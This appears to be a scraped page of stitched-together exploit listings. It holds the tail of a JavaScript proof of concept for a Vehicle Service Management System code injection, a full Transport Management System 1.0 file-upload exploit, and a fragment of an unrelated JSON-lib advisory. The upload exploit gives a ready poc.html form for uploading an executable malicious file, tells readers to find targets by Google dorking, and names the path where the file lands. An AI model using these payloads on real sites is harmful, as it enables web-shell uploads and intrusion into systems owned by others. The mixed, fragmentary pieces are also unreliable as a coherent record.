                xhr.open('POST', 'http://localhost/vservice/classes/Master.php?f=save_page', true);

                // Handle response  
                xhr.onreadystatechange = function() {  
                    if (xhr.readyState === XMLHttpRequest.DONE) {  
                        end_loader();  
                        if (xhr.status === 200) {  
                            const response = JSON.parse(xhr.responseText);  
                            if (response.status === 'success') {  
                                showMessage('Page updated successfully!', 'success');  
                                location.reload(); // Reload the page if successful  
                            } else if (response.status === 'failed' && response.msg) {  
                                showMessage(response.msg, 'error');  
                            } else {  
                                showMessage('An unknown error occurred.', 'error');  
                            }  
                        } else {  
                            showMessage('Error: ' + xhr.statusText, 'error');  
                        }  
                    }  
                };

                // Send the request  
                xhr.send(formData);  
            });  
        </script>  
    </main>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Vehicle Service Management System 1.0 WYSIWYG Code Injection

Transport Management System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Transport Management System 1.0 Remote File Upload Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 6.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
<script data-ad-client="ca-pub-2400875940842439" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<br>  
            <form class="form-horizontal" action="http://127.0.0.1/Transport-Management/newvehicle.php" method="post" enctype="multipart/form-data">

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Number</b></span>  
                  <input id="vehreg" type="text" class="form-control" name="vehregno" placeholder="Reg No">  
                </div>  
                <br> 

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Chesis No</b></span>  
                  <input id="vehchesis" type="text" class="form-control" name="vehchesis" placeholder="Chesis No">  
                </div>  
                <br> 

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Brand</b></span>  
                  <input id="vehbrand" type="text" class="form-control" name="vehbrand" placeholder="Brand">  
                </div>  
                <br>

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Color</b></span>  
                  <input id="vehcolor" type="text" class="form-control" name="vehcolor" placeholder="Color">  
                </div>  
                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Date</b></span>  
                  <input id="vehregdate" type="text" class="form-control" name="vehregdate" placeholder="Registration date">  
                </div>  
                <br>

                                                               <script>  
                      $( function() {  
                        $( "#vehregdate" ).datepicker();  
                      } );  
                </script> 

                                                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Description</b></span>  
                     <textarea rows="5" id="draddress" type="text" class="form-control" name="vehdescription" placeholder="Address"> </textarea>

                                  </div>  
                <br>

                                  
                <div class="input-group">  
                  <span class="input-group-addon"><b>Photo</b></span>  
                  <input  type="file" class="form-control" name="file"> 

              </div>

                                                 <br>

                                <div class="input-group">  
                  <input type="submit" name="submit" class="btn btn-success">

                                  </div>

              </form>     
        </div>    
        <div class="col-md-3"></div>

[+] http://127.0.0.1/Transport-Management/vehicle%20picture/hacked.txt

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Transport Management System 1.0 Arbitrary File Upload

util/JSONTokener.java in JSON-lib before 3.1.0 mishandles an unbalanced comment string.

**JSON-lib mishandles an unbalanced comment string**

Moderate severity GitHub Reviewed Published Oct 4, 2024 to the GitHub Advisory Database • Updated Oct 4, 2024

Tag

#js